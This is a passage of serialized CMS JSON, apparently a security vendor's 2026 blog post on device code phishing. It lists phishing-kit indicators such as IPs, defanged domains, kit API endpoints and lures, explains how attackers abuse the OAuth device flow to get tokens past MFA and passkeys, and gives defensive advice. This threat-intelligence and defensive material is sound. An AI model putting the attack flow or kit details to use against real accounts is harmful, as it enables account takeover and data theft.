hosting",{"data":15397,"content":15398,"nodeType":4581},{},[15399,15409],{"data":15400,"content":15401,"nodeType":4569},{},[15402],{"data":15403,"content":15404,"nodeType":860},{},[15405],{"data":15406,"marks":15407,"value":13903,"nodeType":864},{},[15408],{"type":899},{"data":15410,"content":15411,"nodeType":4569},{},[15412,15423],{"data":15413,"content":15414,"nodeType":860},{},[15415,15419],{"data":15416,"marks":15417,"value":14378,"nodeType":864},{},[15418],{"type":899},{"data":15420,"marks":15421,"value":15422,"nodeType":864},{},[],"34.53.159.84 (Google Cloud AS396982)",{"data":15424,"content":15425,"nodeType":860},{},[15426,15430],{"data":15427,"marks":15428,"value":13944,"nodeType":864},{},[15429],{"type":899},{"data":15431,"marks":15432,"value":15433,"nodeType":864},{},[]," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",{"data":15435,"content":15436,"nodeType":4581},{},[15437,15447],{"data":15438,"content":15439,"nodeType":4569},{},[15440],{"data":15441,"content":15442,"nodeType":860},{},[15443],{"data":15444,"marks":15445,"value":13986,"nodeType":864},{},[15446],{"type":899},{"data":15448,"content":15449,"nodeType":4569},{},[15450],{"data":15451,"content":15452,"nodeType":860},{},[15453],{"data":15454,"marks":15455,"value":15456,"nodeType":864},{},[],"GET /api/generatecode (CloudFront)",{"data":15458,"content":15459,"nodeType":4581},{},[15460,15470],{"data":15461,"content":15462,"nodeType":4569},{},[15463],{"data":15464,"content":15465,"nodeType":860},{},[15466],{"data":15467,"marks":15468,"value":14038,"nodeType":864},{},[15469],{"type":899},{"data":15471,"content":15472,"nodeType":4569},{},[15473],{"data":15474,"content":15475,"nodeType":860},{},[15476],{"data":15477,"marks":15478,"value":15479,"nodeType":864},{},[],"Dolce & Gabbana branded, Italian language, MS account verification",{"data":15481,"content":15482,"nodeType":4581},{},[15483,15493],{"data":15484,"content":15485,"nodeType":4569},{},[15486],{"data":15487,"content":15488,"nodeType":860},{},[15489],{"data":15490,"marks":15491,"value":14261,"nodeType":864},{},[15492],{"type":899},{"data":15494,"content":15495,"nodeType":4569},{},[15496],{"data":15497,"content":15498,"nodeType":860},{},[15499],{"data":15500,"marks":15501,"value":15502,"nodeType":864},{},[],"data-migration-dolcegabbana[.]powerappsportals.com",{"data":15504,"content":15508,"nodeType":996},{"target":15505},{"sys":15506},{"id":15507,"type":1001,"linkType":1002},"4ayQDvpf5NNOBrj9wZZRiO",[],{"data":15510,"content":15511,"nodeType":1005},{},[],{"data":15513,"content":15514,"nodeType":1312},{},[15515],{"data":15516,"marks":15517,"value":15519,"nodeType":864},{},[15518],{"type":899},"Venom",{"data":15521,"content":15522,"nodeType":4845},{},[15523,15546],{"data":15524,"content":15525,"nodeType":4581},{},[15526,15536],{"data":15527,"content":15528,"nodeType":4569},{},[15529],{"data":15530,"content":15531,"nodeType":860},{},[15532],{"data":15533,"marks":15534,"value":13986,"nodeType":864},{},[15535],{"type":899},{"data":15537,"content":15538,"nodeType":4569},{},[15539],{"data":15540,"content":15541,"nodeType":860},{},[15542],{"data":15543,"marks":15544,"value":15545,"nodeType":864},{},[],"POST /token/api/device/start\nGET /token/api/device/status/{sessionId}",{"data":15547,"content":15548,"nodeType":4581},{},[15549,15559],{"data":15550,"content":15551,"nodeType":4569},{},[15552],{"data":15553,"content":15554,"nodeType":860},{},[15555],{"data":15556,"marks":15557,"value":14038,"nodeType":864},{},[15558],{"type":899},{"data":15560,"content":15561,"nodeType":4569},{},[15562],{"data":15563,"content":15564,"nodeType":860},{},[15565],{"data":15566,"marks":15567,"value":15568,"nodeType":864},{},[],"Various: examples include DocuSign \"Verification\" (Microsoft sign-in pretext); DHL \"Delivery Checkpoint\" package shipment pretext",{"data":15570,"content":15574,"nodeType":996},{"target":15571},{"sys":15572},{"id":15573,"type":1001,"linkType":1002},"79C3fces0hgTdf3G68cIrf",[],{"data":15576,"content":15577,"nodeType":1005},{},[],{"data":15579,"content":15580,"nodeType":1312},{},[15581],{"data":15582,"marks":15583,"value":15585,"nodeType":864},{},[15584],{"type":899},"Tycoon2FA",{"data":15587,"content":15588,"nodeType":4845},{},[15589,15619,15656,15679,15702],{"data":15590,"content":15591,"nodeType":4581},{},[15592,15602],{"data":15593,"content":15594,"nodeType":4569},{},[15595],{"data":15596,"content":15597,"nodeType":860},{},[15598],{"data":15599,"marks":15600,"value":13879,"nodeType":864},{},[15601],{"type":899},{"data":15603,"content":15604,"nodeType":4569},{},[15605,15612],{"data":15606,"content":15607,"nodeType":860},{},[15608],{"data":15609,"marks":15610,"value":15611,"nodeType":864},{},[],"Github.io and Cloudflare Workers (workers.dev) hosting",{"data":15613,"content":15614,"nodeType":860},{},[15615],{"data":15616,"marks":15617,"value":15618,"nodeType":864},{},[],"Compromised-site landing pages and CF Workers (*.workers.dev) used as frontends; victim email passed in URL as last path segment ($base64) or ?acct/?encoded query",{"data":15620,"content":15621,"nodeType":4581},{},[15622,15632],{"data":15623,"content":15624,"nodeType":4569},{},[15625],{"data":15626,"content":15627,"nodeType":860},{},[15628],{"data":15629,"marks":15630,"value":13903,"nodeType":864},{},[15631],{"type":899},{"data":15633,"content":15634,"nodeType":4569},{},[15635,15646],{"data":15636,"content":15637,"nodeType":860},{},[15638,15642],{"data":15639,"marks":15640,"value":14378,"nodeType":864},{},[15641],{"type":899},{"data":15643,"marks":15644,"value":15645,"nodeType":864},{},[],"47.253.5.88 (Alibaba Cloud)",{"data":15647,"content":15648,"nodeType":860},{},[15649,15653],{"data":15650,"marks":15651,"value":13944,"nodeType":864},{},[15652],{"type":899},{"data":15654,"marks":15655,"value":14201,"nodeType":864},{},[],{"data":15657,"content":15658,"nodeType":4581},{},[15659,15669],{"data":15660,"content":15661,"nodeType":4569},{},[15662],{"data":15663,"content":15664,"nodeType":860},{},[15665],{"data":15666,"marks":15667,"value":13986,"nodeType":864},{},[15668],{"type":899},{"data":15670,"content":15671,"nodeType":4569},{},[15672],{"data":15673,"content":15674,"nodeType":860},{},[15675],{"data":15676,"marks":15677,"value":15678,"nodeType":864},{},[],"GET /api/session/{UUIDv4} polled with header X-API-Key: \u003Cprefix>_\u003C64-hex> (key materialised at runtime via atob(window.__cyb3r.k)) \nPOST /api/device-code with body {\"prt_foci_session_id\": \"\u003CUUID>\"} (second-stage code retrieval after initial session error)",{"data":15680,"content":15681,"nodeType":4581},{},[15682,15692],{"data":15683,"content":15684,"nodeType":4569},{},[15685],{"data":15686,"content":15687,"nodeType":860},{},[15688],{"data":15689,"marks":15690,"value":14038,"nodeType":864},{},[15691],{"type":899},{"data":15693,"content":15694,"nodeType":4569},{},[15695],{"data":15696,"content":15697,"nodeType":860},{},[15698],{"data":15699,"marks":15700,"value":15701,"nodeType":864},{},[],"Various: SharePoint \"Remittance Advice\"; Microsoft 365 generic sign-in; Microsoft 365 Voicemail (.mp3 attachment); OneDrive \"Shared file\"; German \"Sicheres Dokumentenportal\" PDF lure",{"data":15703,"content":15704,"nodeType":4581},{},[15705,15715],{"data":15706,"content":15707,"nodeType":4569},{},[15708],{"data":15709,"content":15710,"nodeType":860},{},[15711],{"data":15712,"marks":15713,"value":14261,"nodeType":864},{},[15714],{"type":899},{"data":15716,"content":15717,"nodeType":4569},{},[15718],{"data":15719,"content":15720,"nodeType":860},{},[15721],{"data":15722,"marks":15723,"value":15724,"nodeType":864},{},[],"afriqbeauglobal[.]com/homepage/index[.]html",{"data":15726,"content":15729,"nodeType":996},{"target":15727},{"sys":15728},{"id":7719,"type":1001,"linkType":1002},[],{"data":15731,"content":15732,"nodeType":1005},{},[],{"data":15734,"content":15735,"nodeType":1312},{},[15736],{"data":15737,"marks":15738,"value":15740,"nodeType":864},{},[15739],{"type":899},"\"CYB3R\"",{"data":15742,"content":15743,"nodeType":4845},{},[15744,15767,15805,15827,15850],{"data":15745,"content":15746,"nodeType":4581},{},[15747,15757],{"data":15748,"content":15749,"nodeType":4569},{},[15750],{"data":15751,"content":15752,"nodeType":860},{},[15753],{"data":15754,"marks":15755,"value":13879,"nodeType":864},{},[15756],{"type":899},{"data":15758,"content":15759,"nodeType":4569},{},[15760],{"data":15761,"content":15762,"nodeType":860},{},[15763],{"data":15764,"marks":15765,"value":15766,"nodeType":864},{},[],"Cloudflare Workers (workers.dev) hosting",{"data":15768,"content":15769,"nodeType":4581},{},[15770,15780],{"data":15771,"content":15772,"nodeType":4569},{},[15773],{"data":15774,"content":15775,"nodeType":860},{},[15776],{"data":15777,"marks":15778,"value":13903,"nodeType":864},{},[15779],{"type":899},{"data":15781,"content":15782,"nodeType":4569},{},[15783,15794],{"data":15784,"content":15785,"nodeType":860},{},[15786,15790],{"data":15787,"marks":15788,"value":14378,"nodeType":864},{},[15789],{"type":899},{"data":15791,"marks":15792,"value":15793,"nodeType":864},{},[],"2400:8d60:2::1:c116:843e (Evoxt VPS)",{"data":15795,"content":15796,"nodeType":860},{},[15797,15801],{"data":15798,"marks":15799,"value":13944,"nodeType":864},{},[15800],{"type":899},{"data":15802,"marks":15803,"value":15804,"nodeType":864},{},[]," axios/1.13.6",{"data":15806,"content":15807,"nodeType":4581},{},[15808,15818],{"data":15809,"content":15810,"nodeType":4569},{},[15811],{"data":15812,"content":15813,"nodeType":860},{},[15814],{"data":15815,"marks":15816,"value":13986,"nodeType":864},{},[15817],{"type":899},{"data":15819,"content":15820,"nodeType":4569},{},[15821],{"data":15822,"content":15823,"nodeType":860},{},[15824],{"data":15825,"marks":15826,"value":15678,"nodeType":864},{},[],{"data":15828,"content":15829,"nodeType":4581},{},[15830,15840],{"data":15831,"content":15832,"nodeType":4569},{},[15833],{"data":15834,"content":15835,"nodeType":860},{},[15836],{"data":15837,"marks":15838,"value":14038,"nodeType":864},{},[15839],{"type":899},{"data":15841,"content":15842,"nodeType":4569},{},[15843],{"data":15844,"content":15845,"nodeType":860},{},[15846],{"data":15847,"marks":15848,"value":15849,"nodeType":864},{},[],"DocuSign in Spanish (\"Documento Firmar — COTIZACIÓN/ESTIMACIÓN.pdf\", \"Complete su firma\", \"Verifique su identidad\", \"Continuar a Microsoft\").",{"data":15851,"content":15852,"nodeType":4581},{},[15853,15863],{"data":15854,"content":15855,"nodeType":4569},{},[15856],{"data":15857,"content":15858,"nodeType":860},{},[15859],{"data":15860,"marks":15861,"value":14261,"nodeType":864},{},[15862],{"type":899},{"data":15864,"content":15865,"nodeType":4569},{},[15866],{"data":15867,"content":15868,"nodeType":860},{},[15869],{"data":15870,"marks":15871,"value":15872,"nodeType":864},{},[],"muzagestion[.]secure-share[.]workers.dev",{"data":15874,"content":15878,"nodeType":996},{"target":15875},{"sys":15876},{"id":15877,"type":1001,"linkType":1002},"5EU0QNteiQcYybKG1W1cS3",[],{"data":15880,"content":15881,"nodeType":1005},{},[],{"data":15883,"content":15884,"nodeType":1009},{},[15885],{"data":15886,"marks":15887,"value":15889,"nodeType":864},{},[15888],{"type":899},"Device code phishing under the hood",{"data":15891,"content":15892,"nodeType":860},{},[15893,15897],{"data":15894,"marks":15895,"value":15896,"nodeType":864},{},[],"The attacker POSTs to the authorization server's device authorization endpoint with its client_id (i.e. an application ID) and requested scopes or resources. The server responds with a device_code (used for polling), a user_code, a verification_uri, an expires_in value, and a polling interval. The user visits the URL, enters the code and approves the request. Meanwhile, the device polls the token endpoint. Once approved, the server returns an access token, a refresh token (if offline_access was requested), and an ID token (if openid was included). ",{"data":15898,"marks":15899,"value":15901,"nodeType":864},{},[15900],{"type":899},"The attacker now has API access to the victim's account. ",{"data":15903,"content":15904,"nodeType":860},{},[15905],{"data":15906,"marks":15907,"value":15908,"nodeType":864},{},[],"Broadly, this gives the attacker a comparable level of control to a “normal” phishing attack (with conditions based on the scopes granted and specific app being targeted) while API access grants additional capabilities beyond standard browser sessions. When combined with other techniques, this access can be exchanged to open normal browser app sessions and access SSO connected apps.",{"data":15910,"content":15914,"nodeType":996},{"target":15911},{"sys":15912},{"id":15913,"type":1001,"linkType":1002},"4WtQR2xsE236yoyhSXj58Z",[],{"data":15916,"content":15920,"nodeType":996},{"target":15917},{"sys":15918},{"id":15919,"type":1001,"linkType":1002},"1x7Lip7JdY2xlHKKurT7qJ",[],{"data":15922,"content":15923,"nodeType":860},{},[15924],{"data":15925,"marks":15926,"value":15927,"nodeType":864},{},[],"At this point, you can achieve a number of objectives both inside the app ecosystem and across SSO connected apps — e.g. data theft, disruption, and ultimately extortion.",{"data":15929,"content":15930,"nodeType":860},{},[15931,15935,15940,15944],{"data":15932,"marks":15933,"value":15934,"nodeType":864},{},[],"Critically, the initial request to generate a device code is typically ",{"data":15936,"marks":15937,"value":15939,"nodeType":864},{},[15938],{"type":899},"unauthenticated",{"data":15941,"marks":15942,"value":15943,"nodeType":864},{},[]," across all providers — ",{"data":15945,"marks":15946,"value":15948,"nodeType":864},{},[15947],{"type":899},"anyone can generate one, from any machine, without proving any relationship to the target organization.",{"data":15950,"content":15951,"nodeType":860},{},[15952,15956,15961],{"data":15953,"marks":15954,"value":15955,"nodeType":864},{},[],"So, the attacker has to deliver a set of instructions via a phishing channel (e.g. email, social media DM, corp IM platform, and so on) with a device code that they have generated. The victim then enters this code on the ",{"data":15957,"marks":15958,"value":15960,"nodeType":864},{},[15959],{"type":899},"legitimate device code login page",{"data":15962,"marks":15963,"value":15964,"nodeType":864},{},[]," for that app and issues the tokens to the attacker.",{"data":15966,"content":15970,"nodeType":996},{"target":15967},{"sys":15968},{"id":15969,"type":1001,"linkType":1002},"1txUYuQjH9FlbDGTo8AbZB",[],{"data":15972,"content":15973,"nodeType":1005},{},[],{"data":15975,"content":15976,"nodeType":1009},{},[15977],{"data":15978,"marks":15979,"value":15981,"nodeType":864},{},[15980],{"type":899},"Why device code phishing is so dangerous",{"data":15983,"content":15984,"nodeType":1312},{},[15985],{"data":15986,"marks":15987,"value":15989,"nodeType":864},{},[15988],{"type":899},"Device code phishing bypasses authentication controls (including passkeys)",{"data":15991,"content":15992,"nodeType":860},{},[15993,15997,16002,16006],{"data":15994,"marks":15995,"value":15996,"nodeType":864},{},[],"A device code phishing attack ",{"data":15998,"marks":15999,"value":16001,"nodeType":864},{},[16000],{"type":899},"cannot be prevented with authentication controls",{"data":16003,"marks":16004,"value":16005,"nodeType":864},{},[],". This includes all forms of MFA and ",{"data":16007,"marks":16008,"value":16010,"nodeType":864},{},[16009],{"type":899},"even “phishing-resistant” authentication methods such as passkeys. ",{"data":16012,"content":16013,"nodeType":860},{},[16014,16019,16023,16028],{"data":16015,"marks":16016,"value":16018,"nodeType":864},{},[16017],{"type":899},"The device code authorization is effectively performed post-authentication. ",{"data":16020,"marks":16021,"value":16022,"nodeType":864},{},[],"If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. ",{"data":16024,"marks":16025,"value":16027,"nodeType":864},{},[16026],{"type":899},"No password or MFA required. ",{"data":16029,"marks":16030,"value":16031,"nodeType":864},{},[],"You can see an example in the video below.",{"data":16033,"content":16036,"nodeType":996},{"target":16034},{"sys":16035},{"id":14965,"type":1001,"linkType":1002},[],{"data":16038,"content":16039,"nodeType":860},{},[16040],{"data":16041,"marks":16042,"value":16043,"nodeType":864},{},[],"Even if you do have to sign in again (because you're not already signed in for some reason), the attack still works because it isn't targeting the login — it's targeting the authorization layer instead.",{"data":16045,"content":16046,"nodeType":860},{},[16047],{"data":16048,"marks":16049,"value":16050,"nodeType":864},{},[],"This is what makes device code phishing different to other standard phishing methods like AiTM phishing (and arguably even more effective in environments with strict identity control enforcement). ",{"data":16052,"content":16053,"nodeType":1312},{},[16054],{"data":16055,"marks":16056,"value":16058,"nodeType":864},{},[16057],{"type":899},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",{"data":16060,"content":16061,"nodeType":860},{},[16062],{"data":16063,"marks":16064,"value":16065,"nodeType":864},{},[],"Device code authorization is a legitimate mechanism regularly used in enterprise environments, particularly for CLI logins. Tools like Azure CLI, GitHub CLI, and AWS CLI all use (or have used) the device code flow as a primary or fallback authentication method. This creates a dual problem for defenders. ",{"data":16067,"content":16068,"nodeType":860},{},[16069],{"data":16070,"marks":16071,"value":16072,"nodeType":864},{},[],"First, the phishing attack happens entirely on a legitimate site — there's no fake login page, no malicious payload to scan for, and the URL in the browser is genuine. Since there's no traditional phishing content being delivered, these attacks are more resistant to detection by email and network security tools.",{"data":16074,"content":16075,"nodeType":860},{},[16076],{"data":16077,"marks":16078,"value":16079,"nodeType":864},{},[],"Second, the widespread legitimate use of device code flow — particularly among developers and technical users — normalizes the experience of entering device codes. A phishing lure asking them to do the same thing is indistinguishable from a legitimate IT request. And for non-technical users, this experience isn't much different to, for example, entering a code sent via email or authenticator app. ",{"data":16081,"content":16082,"nodeType":1312},{},[16083],{"data":16084,"marks":16085,"value":16087,"nodeType":864},{},[16086],{"type":899},"Multiple apps are vulnerable, with different risk profiles",{"data":16089,"content":16090,"nodeType":860},{},[16091],{"data":16092,"marks":16093,"value":16094,"nodeType":864},{},[],"Various apps implement the device code flow, each with different levels of control and default security, but the risk is not uniform across platforms. ",{"data":16096,"content":16097,"nodeType":941},{},[16098,16113,16127],{"data":16099,"content":16100,"nodeType":945},{},[16101],{"data":16102,"content":16103,"nodeType":860},{},[16104,16109],{"data":16105,"marks":16106,"value":16108,"nodeType":864},{},[16107],{"type":899},"Google Workspace ",{"data":16110,"marks":16111,"value":16112,"nodeType":864},{},[],"is a significantly lower-risk target because Google explicitly limits which scopes are available to the device code flow — Gmail, Calendar, and most Workspace APIs are simply unavailable through this mechanism. ",{"data":16114,"content":16115,"nodeType":945},{},[16116],{"data":16117,"content":16118,"nodeType":860},{},[16119,16123],{"data":16120,"marks":16121,"value":13585,"nodeType":864},{},[16122],{"type":899},{"data":16124,"marks":16125,"value":16126,"nodeType":864},{},[]," offers the broadest attack surface due to unrestricted scopes, reusable first-party client IDs, and the FOCI/PRT escalation paths. ",{"data":16128,"content":16129,"nodeType":945},{},[16130],{"data":16131,"content":16132,"nodeType":860},{},[16133,16137,16141],{"data":16134,"marks":16135,"value":16136,"nodeType":864},{},[],"Apps like ",{"data":16138,"marks":16139,"value":6423,"nodeType":864},{},[16140],{"type":899},{"data":16142,"marks":16143,"value":16144,"nodeType":864},{},[]," sit in between — broad scopes are available (including full repository access), but the attacker must control their own OAuth app and the victim sees an explicit consent screen. ",{"data":16146,"content":16150,"nodeType":996},{"target":16147},{"sys":16148},{"id":16149,"type":1001,"linkType":1002},"ejNSC76jge1p1zzz9wwiG",[],{"data":16152,"content":16153,"nodeType":1005},{},[],{"data":16155,"content":16156,"nodeType":1009},{},[16157],{"data":16158,"marks":16159,"value":16161,"nodeType":864},{},[16160],{"type":899},"Security recommendations",{"data":16163,"content":16164,"nodeType":860},{},[16165],{"data":16166,"marks":16167,"value":16168,"nodeType":864},{},[],"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. ",{"data":16170,"content":16171,"nodeType":860},{},[16172],{"data":16173,"marks":16174,"value":16175,"nodeType":864},{},[],"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",{"data":16177,"content":16178,"nodeType":860},{},[16179,16183,16192,16196,16201,16205,16210,16214,16219],{"data":16180,"marks":16181,"value":16182,"nodeType":864},{},[],"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",{"data":16184,"content":16186,"nodeType":883},{"uri":16185},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/new-microsoft-managed-policies-to-raise-your-identity-security-posture/4286758",[16187],{"data":16188,"marks":16189,"value":16191,"nodeType":864},{},[16190],{"type":1455},"Microsoft now explicitly recommends",{"data":16193,"marks":16194,"value":16195,"nodeType":864},{},[]," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",{"data":16197,"marks":16198,"value":16200,"nodeType":864},{},[16199],{"type":899},"Authentication Flows",{"data":16202,"marks":16203,"value":16204,"nodeType":864},{},[]," condition to block ",{"data":16206,"marks":16207,"value":16209,"nodeType":864},{},[16208],{"type":899},"Device Code Flow",{"data":16211,"marks":16212,"value":16213,"nodeType":864},{},[],", and set the grant control to ",{"data":16215,"marks":16216,"value":16218,"nodeType":864},{},[16217],{"type":899},"Block Access",{"data":16220,"marks":16221,"value":16222,"nodeType":864},{},[],". Deploy in report-only mode first to identify any legitimate device code usage, then enforce with narrow exceptions.",{"data":16224,"content":16228,"nodeType":996},{"target":16225},{"sys":16226},{"id":16227,"type":1001,"linkType":1002},"mQIj2o9xRzkZYKNmanB25",[],{"data":16230,"content":16231,"nodeType":860},{},[16232],{"data":16233,"marks":16234,"value":16235,"nodeType":864},{},[],"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",{"data":16237,"content":16238,"nodeType":1005},{},[],{"data":16240,"content":16241,"nodeType":1009},{},[16242],{"data":16243,"marks":16244,"value":16246,"nodeType":864},{},[16245],{"type":899},"How Push Security can help",{"data":16248,"content":16249,"nodeType":860},{},[16250],{"data":16251,"marks":16252,"value":16253,"nodeType":864},{},[],"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",{"data":16255,"content":16256,"nodeType":860},{},[16257],{"data":16258,"marks":16259,"value":16260,"nodeType":864},{},[],"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. ",{"data":16262,"content":16263,"nodeType":860},{},[16264,16268,16277],{"data":16265,"marks":16266,"value":16267,"nodeType":864},{},[],"Using Push you can also ",{"data":16269,"content":16271,"nodeType":883},{"uri":16270},"https://pushsecurity.com/help/can-i-use-push-to-help-protect-against-device-code-phishing-scenarios/",[16272],{"data":16273,"marks":16274,"value":16276,"nodeType":864},{},[16275],{"type":1455},"configure in-browser warnings",{"data":16278,"marks":16279,"value":16280,"nodeType":864},{},[]," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",{"data":16282,"content":16286,"nodeType":996},{"target":16283},{"sys":16284},{"id":16285,"type":1001,"linkType":1002},"3JsbGaOKSS3INzBUJpoh1W",[],{"data":16288,"content":16289,"nodeType":860},{},[16290],{"data":16291,"marks":16292,"value":16293,"nodeType":864},{},[],"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",{"data":16295,"content":16296,"nodeType":1312},{},[16297],{"data":16298,"marks":16299,"value":3578,"nodeType":864},{},[16300],{"type":899},{"data":16302,"content":16303,"nodeType":860},{},[16304],{"data":16305,"marks":16306,"value":16307,"nodeType":864},{},[],"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",{"data":16309,"content":16310,"nodeType":860},{},[16311,16315,16322,16325,16333,16336,16343],{"data":16312,"marks":16313,"value":16314,"nodeType":864},{},[],"To learn more about Push, ",{"data":16316,"content":16317,"nodeType":883},{"uri":10269},[16318],{"data":16319,"marks":16320,"value":10275,"nodeType":864},{},[16321],{"type":1455},{"data":16323,"marks":16324,"value":3731,"nodeType":864},{},[],{"data":16326,"content":16327,"nodeType":883},{"uri":10281},[16328],{"data":16329,"marks":16330,"value":16332,"nodeType":864},{},[16331],{"type":1455},"view our demo library",{"data":16334,"marks":16335,"value":10291,"nodeType":864},{},[],{"data":16337,"content":16338,"nodeType":883},{"uri":1700},[16339],{"data":16340,"marks":16341,"value":10299,"nodeType":864},{},[16342],{"type":1455},{"data":16344,"marks":16345,"value":2924,"nodeType":864},{},[],"Device code phishing attacks have skyrocketed: here’s what you need to know","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access controls.","2026-04-04T00:00:00.000Z",{"items":16350},[16351,16353],{"sys":16352,"name":6593},{"id":6592},{"sys":16354,"name":342},{"id":6596},{"items":16356},[16357],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":16358},{"url":4955},{"__typename":2059,"sys":16360,"content":16361,"title":6584,"synopsis":6585,"hashTags":59,"publishedDate":6586,"slug":6587,"tagsCollection":17070,"authorsCollection":17076},{"id":5746},{"json":16362},{"data":16363,"content":16364,"nodeType":856},{},[16365,16380,16395,16410,16415,16418,16425,16431,16437,16443,16449,16456,16459,16466,16472,16478,16484,16489,16496,16511,16517,16523,16536,16543,16567,16580,16586,16610,16617,16641,16647,16654,16669,16675,16681,16686,16692,16699,16714,16720,16736,16742,16745,16752,16758,16833,16839,16852,16855,16880,16895,16901,16907,16910,16917,16932,16938,16944,16959,16962,16969,16975,17005,17011,17026,17041,17046,17049,17055],{"data":16366,"content":16367,"nodeType":860},{},[16368,16371,16377],{"data":16369,"marks":16370,"value":5757,"nodeType":864},{},[],{"data":16372,"content":16373,"nodeType":883},{"uri":5760},[16374],{"data":16375,"marks":16376,"value":5765,"nodeType":864},{},[],{"data":16378,"marks":16379,"value":5769,"nodeType":864},{},[],{"data":16381,"content":16382,"nodeType":860},{},[16383,16386,16392],{"data":16384,"marks":16385,"value":5776,"nodeType":864},{},[],{"data":16387,"content":16388,"nodeType":883},{"uri":5779},[16389],{"data":16390,"marks":16391,"value":5784,"nodeType":864},{},[],{"data":16393,"marks":16394,"value":5788,"nodeType":864},{},[],{"data":16396,"content":16397,"nodeType":860},{},[16398,16401,16407],{"data":16399,"marks":16400,"value":5795,"nodeType":864},{},[],{"data":16402,"content":16403,"nodeType":883},{"uri":5243},[16404],{"data":16405,"marks":16406,"value":5248,"nodeType":864},{},[],{"data":16408,"marks":16409,"value":5805,"nodeType":864},{},[],{"data":16411,"content":16414,"nodeType":996},{"target":16412},{"sys":16413},{"id":5810,"type":1001,"linkType":1002},[],{"data":16416,"content":16417,"nodeType":1005},{},[],{"data":16419,"content":16420,"nodeType":1009},{},[16421],{"data":16422,"marks":16423,"value":5822,"nodeType":864},{},[16424],{"type":899},{"data":16426,"content":16427,"nodeType":860},{},[16428],{"data":16429,"marks":16430,"value":5829,"nodeType":864},{},[],{"data":16432,"content":16433,"nodeType":860},{},[16434],{"data":16435,"marks":16436,"value":5836,"nodeType":864},{},[],{"data":16438,"content":16439,"nodeType":860},{},[16440],{"data":16441,"marks":16442,"value":5843,"nodeType":864},{},[],{"data":16444,"content":16445,"nodeType":860},{},[16446],{"data":16447,"marks":16448,"value":5850,"nodeType":864},{},[],{"data":16450,"content":16451,"nodeType":860},{},[16452],{"data":16453,"marks":16454,"value":5858,"nodeType":864},{},[16455],{"type":899},{"data":16457,"content":16458,"nodeType":1005},{},[],{"data":16460,"content":16461,"nodeType":1009},{},[16462],{"data":16463,"marks":16464,"value":5869,"nodeType":864},{},[16465],{"type":899},{"data":16467,"content":16468,"nodeType":860},{},[16469],{"data":16470,"marks":16471,"value":5876,"nodeType":864},{},[],{"data":16473,"content":16474,"nodeType":860},{},[16475],{"data":16476,"marks":16477,"value":5883,"nodeType":864},{},[],{"data":16479,"content":16480,"nodeType":860},{},[16481],{"data":16482,"marks":16483,"value":5890,"nodeType":864},{},[],{"data":16485,"content":16488,"nodeType":996},{"target":16486},{"sys":16487},{"id":5895,"type":1001,"linkType":1002},[],{"data":16490,"content":16491,"nodeType":1312},{},[16492],{"data":16493,"marks":16494,"value":5904,"nodeType":864},{},[16495],{"type":899},{"data":16497,"content":16498,"nodeType":860},{},[16499,16502,16508],{"data":16500,"marks":16501,"value":5911,"nodeType":864},{},[],{"data":16503,"content":16504,"nodeType":883},{"uri":5914},[16505],{"data":16506,"marks":16507,"value":5919,"nodeType":864},{},[],{"data":16509,"marks":16510,"value":5923,"nodeType":864},{},[],{"data":16512,"content":16513,"nodeType":860},{},[16514],{"data":16515,"marks":16516,"value":5930,"nodeType":864},{},[],{"data":16518,"content":16519,"nodeType":860},{},[16520],{"data":16521,"marks":16522,"value":5937,"nodeType":864},{},[],{"data":16524,"content":16525,"nodeType":860},{},[16526,16529,16533],{"data":16527,"marks":16528,"value":5944,"nodeType":864},{},[],{"data":16530,"marks":16531,"value":5949,"nodeType":864},{},[16532],{"type":899},{"data":16534,"marks":16535,"value":5953,"nodeType":864},{},[],{"data":16537,"content":16538,"nodeType":1312},{},[16539],{"data":16540,"marks":16541,"value":5961,"nodeType":864},{},[16542],{"type":899},{"data":16544,"content":16545,"nodeType":860},{},[16546,16549,16555,16558,16564],{"data":16547,"marks":16548,"value":5968,"nodeType":864},{},[],{"data":16550,"content":16551,"nodeType":883},{"uri":5971},[16552],{"data":16553,"marks":16554,"value":5976,"nodeType":864},{},[],{"data":16556,"marks":16557,"value":5980,"nodeType":864},{},[],{"data":16559,"content":16560,"nodeType":883},{"uri":3237},[16561],{"data":16562,"marks":16563,"value":5987,"nodeType":864},{},[],{"data":16565,"marks":16566,"value":5991,"nodeType":864},{},[],{"data":16568,"content":16569,"nodeType":860},{},[16570,16573,16577],{"data":16571,"marks":16572,"value":5998,"nodeType":864},{},[],{"data":16574,"marks":16575,"value":6003,"nodeType":864},{},[16576],{"type":899},{"data":16578,"marks":16579,"value":6007,"n